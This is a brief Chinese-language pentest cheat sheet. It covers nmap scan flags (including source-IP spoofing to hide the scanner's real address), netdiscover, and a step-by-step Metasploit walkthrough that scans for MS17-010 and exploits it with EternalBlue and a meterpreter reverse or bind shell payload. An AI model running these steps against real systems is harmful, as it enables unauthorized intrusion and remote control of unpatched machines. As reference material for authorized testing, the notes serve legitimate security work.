Nmap扫描
扫描一个段的主机在线状况(进行ping扫描)
nmap -sP -T4 172.10.22.1/24 | grep Nmap | cut -d "(" -f 2 |cut -d ")" -f 1
相关扫描命令:
-T4: 快速扫描(可以加快执行速度)
-sn:Ping扫描, 不进行端口扫描(-sn被称为-sP)
-sA: 发送tcp的ack包进行探测,可以探测主机是否存活
-sS: 半开放扫描(半开扫描,很少有系统能把它记入系统日志,非3次握手的tcp扫描)
-sT:3次握手方式tcp的扫描,慢
-sU:udp端口的扫描
-sF:也是tcp的扫描一种,发送一个FIN标志的数据包
-sV:版本检测(sV)
-Pn: 跳过主机发现,进行深入扫描(防止主机过滤ping扫描,可直接进行端口扫描)
-O: 操作系统检测
-A: 参数,综合扫描。比较慢,不推荐
-e: 指定网络接口,扫描时使用哪个网卡
nmap -e eth0 192.168.1.1/24
-S: 可以伪装源地址进行扫描。这样好处在于不会被对方发现自己的真实IP
nmap -e eth0 192.168.1.53 -S 10.0.1.167 -Pn
netdiscover
netdiscover [通用选项] [ip]
netdiscover -r 192.168.0.1/24
-p :被动扫描(贼慢)
Metasploit
启动数据库
service postgresql start
查看是否连接数据库
service postgresql status
启动Metasploit(msfconsole模式下)
msfconsole -q
更新metasploit
msfupdate
例子
search ms17
1、使用扫描模块
查看是否存在漏洞(存在前面一个+)
use auxiliary/scanner/smb/smb_ms17_010
option
set rhosts x.x.x.x or set rhosts x.x.x.x/24
run运行
2、使用攻击模块
use exploit/windows/smb/ms17_010_eternalblue
option(or info)查看参数
set rhost x.x.x.x
这需要路由器开放端口,才能返弹
set payload windows/x64/meterpreter/reverse_tcp
这直接绑定
set payload windows/x64/meterpreter/bind_tcp
run运行
